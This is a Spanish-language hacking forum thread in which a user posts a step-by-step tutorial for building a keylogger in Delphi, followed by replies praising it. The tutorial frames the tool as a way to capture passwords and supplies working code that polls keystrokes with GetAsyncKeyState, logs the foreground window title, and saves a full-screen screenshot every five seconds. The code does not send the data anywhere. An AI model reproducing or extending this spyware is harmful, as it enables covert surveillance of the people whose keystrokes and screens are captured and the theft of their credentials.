comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Delphi] Creacion de un Keylogger

  • 4 Respuestas
  • 1766 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Septiembre 09, 2013, 01:21:19 pm »
[Titulo] : Creacion de un Keylogger
[Lenguaje] : Delphi
[Autor] : Doddy Hackman

[Temario]

-- =================--------

0x01 : Introduccion
0x02 : Capturar teclas
0x03 : Capturar ventanas
0x04 : Capturar pantalla
0x05 : Testeando

-- =================--------


0x01 : Introduccion

Bueno , voy a empezar esta manual sobre como hacer un keylogger en delphi , yo estoy usando la version 2010 de delphi.

Un keylogger es un programa que graba de forma oculta las teclas que escribe el usuario , en otras palabras , se usa para capturar contraseñas.

En esta manual veremos como capturar teclas , ventanas y hacer capturas de pantalla en delphi.

0x02 : Capturar teclas

Para comenzar creemos un proyecto normal en delphi de la siguiente manera : File->New->VCL Forms Application , como en la siguiente imagen.



Una vez hecho agregamos un memo y tres timers al formulario como en la imagen :



Una vez hecho esto hacemos doble click en el primer timer y agregamos este codigo al mismo.

Código: Delphi
  1. procedure TForm1.Timer1Timer(Sender: TObject);
  2. var
  3.   i: integer; // Declaramos la variable i como entero
  4.   re: Longint; // Declaramos la variable re como longint
  5.   mayus: integer; // Declaramos la variable mayus como entero
  6.  
  7. begin
  8.  
  9.   if (GetKeyState(20) = 0) then // Si se presiona mayus
  10.   begin
  11.     mayus := 32; // Le ponemos el valor de 32 a la variable mayus
  12.   end
  13.   else
  14.   begin
  15.     mayus := 0; // Le ponemos el valor de 0 la variable mayus
  16.   end;
  17.  
  18.   for i := 65 to 90 do // Un for para detectar las teclas de la A hasta la Z
  19.   begin
  20.  
  21.     re := GetAsyncKeyState(i); // Usamos la variable re para detectar si la tecla fue usada
  22.     If re = -32767 then // Contolamos que la variable re sea igual a -32767
  23.     Begin
  24.  
  25.       Memo1.Text := Memo1.Text + Chr(i + mayus); // Escribimos en el memo usando chr en la suma de la letra
  26.       // Mas la variabe mayus
  27.     End;
  28.   end;
  29.  
  30. end;
  31.  

Una imagen con todo el codigo comentado :



Con esto ya tenemos para capturar las teclas.

0x03 : Capturar ventanas

Aca es donde se me complico un poco , para empezar tenemos que agregar en "private" que se encuentra al inicio del codigo lo siguiente :

Código: Delphi
  1. private Nombre2: string;
  2.  

Con este declaramos el nombre de la ventana que es nombre2 como privado.

Ahora tenemos que hacer doble click al segundo timer y poner el siguiente codigo :

Código: Delphi
  1. procedure TForm1.Timer2Timer(Sender: TObject);
  2. var
  3.   ventana1: array [0 .. 255] of char; // Declaramos ventana1 como array of char
  4.   nombre1: string; // Declaramos nombre1 como string
  5.  
  6.   // Add :
  7.   // private
  8.   // Nombre2: string;
  9.  
  10. begin
  11.  
  12.   GetWindowText(GetForegroundWindow, ventana1, SizeOf(ventana1));
  13.   // Capturamos el nombre de la
  14.   // ventana
  15.  
  16.   nombre1 := ventana1; // nombre1 tendra el valor de ventana1
  17.  
  18.   if not(nombre1 = nombre2) then // Si nombre1 no es nombre2 ........
  19.   begin
  20.     nombre2 := nombre1; // nombre2 tendra el valor de nombre1
  21.     Memo1.Lines.Add(nombre2); // agregamos al memo el valor de nombre2
  22.   end;
  23. end;
  24.  

Una imagen con el codigo comentado :



Eso seria la parte de capturar ventanas.

0x04 : Capturar pantalla

Ahora vamos a la parte mas facil , voy a usar como ejemplo un codigo que hice para un programa llamado "DH ScreenShoter" que hice en este mismo lenguaje.

Lo primero que hay que hacer es agregar Jpeg en "uses" al inicio del codigo.

Ahora hacemos doble click en el tercer timer y agregamos este codigo :

Código: Delphi
  1. procedure TForm1.Timer3Timer(Sender: TObject);
  2. var
  3.   foto1: TBitmap; // Declaramos foto1 como TBitmap;
  4.   foto2: TJpegImage; // Declaramos foto2 como TJpegImage
  5.   ventana: HDC; // Declaramos aca como HDC
  6.  
  7. begin
  8.  
  9.   // Agregar "Jpeg" a "uses"
  10.  
  11.   ventana := GetWindowDC(GetDesktopWindow); // Capturamos ventana actual en aca
  12.  
  13.   foto1 := TBitmap.Create; // Iniciamos foto1 como TBitmap
  14.   foto1.PixelFormat := pf24bit; // Establecemos el pixel format
  15.   foto1.Height := Screen.Height; // Capturamos el tamaño
  16.   foto1.Width := Screen.Width; // Capturamos el tamaño
  17.  
  18.   BitBlt(foto1.Canvas.Handle, 0, 0, foto1.Width, foto1.Height, ventana, 0, 0,
  19.     SRCCOPY); // Tomamos la foto con los datos antes usados
  20.  
  21.   foto2 := TJpegImage.Create; // Iniciamos foto2 como TJpegImage
  22.   foto2.Assign(foto1); // Asignamos foto1 en foto2
  23.   foto2.CompressionQuality := 60; // Establecemos la calidad de la imagen
  24.  
  25.   foto2.SaveToFile(IntToStr(Random(100)) + '.jpg');
  26.   // Guardamos la foto tomada
  27.   // con un valor numerico
  28.   // aleatorio mas el formato
  29.   // '.jpg'
  30.  
  31. end;
  32.  

Una imagen con el codigo comentado :



Despues de esto tenemos que configurar el "interval" del timer3 a "5000" , que en realidad es para que el timer funcione cada 5 segundos.

Con esto ya terminamos la parte de capturar las imagenes.

Ahora vamos a probar todo.

0x05 : Testeando

Una vez terminado todo establecemos los tres timers en true en la parte "Enabled" de la configuracion de los timers.

Bien ahora voy a mostrarles una imagen de ejemplo :



Como pueden ver en la imagen , el keylogger detecto la ventana actual que es "Form1" (el programa mismo) y tambien detecta bien las minusculas y mayusculas cuando escribi "HolaMundo"
Tambien cada 5 segundos sacaba una foto como esta :



Eso seria todo.

El manual esta disponible en PDF aca.

--========--
  The End ?
--========--


Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Septiembre 09, 2013, 01:24:09 pm »
Esta excelente Doddy!! Felicitaciones!
Este post se merece aparecer en el blog!

Saludos!
ANTRAX


Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« Respuesta #2 en: Septiembre 09, 2013, 01:27:24 pm »
sisi realmente si Antrax.
Excelente.

Saludos

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Septiembre 09, 2013, 02:37:08 pm »
Listo!!
http://blog.underc0de.org/2013/09/delphi-creacion-de-un-keylogger.html
Lo unico que el link del PDF no me funciono..

Saludos!
ANTRAX


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 636
  • Actividad:
    6.67%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #4 en: Septiembre 10, 2013, 10:32:43 am »
HOLA!!!

Que lindo ver que aun hay entusiasmo en delphi!

Ya no lo uso mucho pero me encanta!

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   DOORS.PARTY

 

¿Te gustó el post? COMPARTILO!



[Sintaxis general de Delphi] By: Geek Lord Venezuela [R00t] Team

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2049
Último mensaje Febrero 24, 2010, 04:35:15 pm
por ANTRAX
Eliminar acentos y otros agregados de un caracter/cadena Delphi 2009

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3258
Último mensaje Febrero 24, 2010, 04:57:14 pm
por ANTRAX
1er troyano en Delphi By: Geek Lord Venezuela [R00t] Team

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3489
Último mensaje Febrero 24, 2010, 04:34:48 pm
por ANTRAX
[Delphi] Project Arsenal X 0.2 (Regalo de navidad)

Iniciado por BigBear

Respuestas: 2
Vistas: 2918
Último mensaje Diciembre 28, 2015, 10:27:44 am
por BigBear
Poner splash screen con progress bar en delphi

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2977
Último mensaje Febrero 24, 2010, 04:54:23 pm
por ANTRAX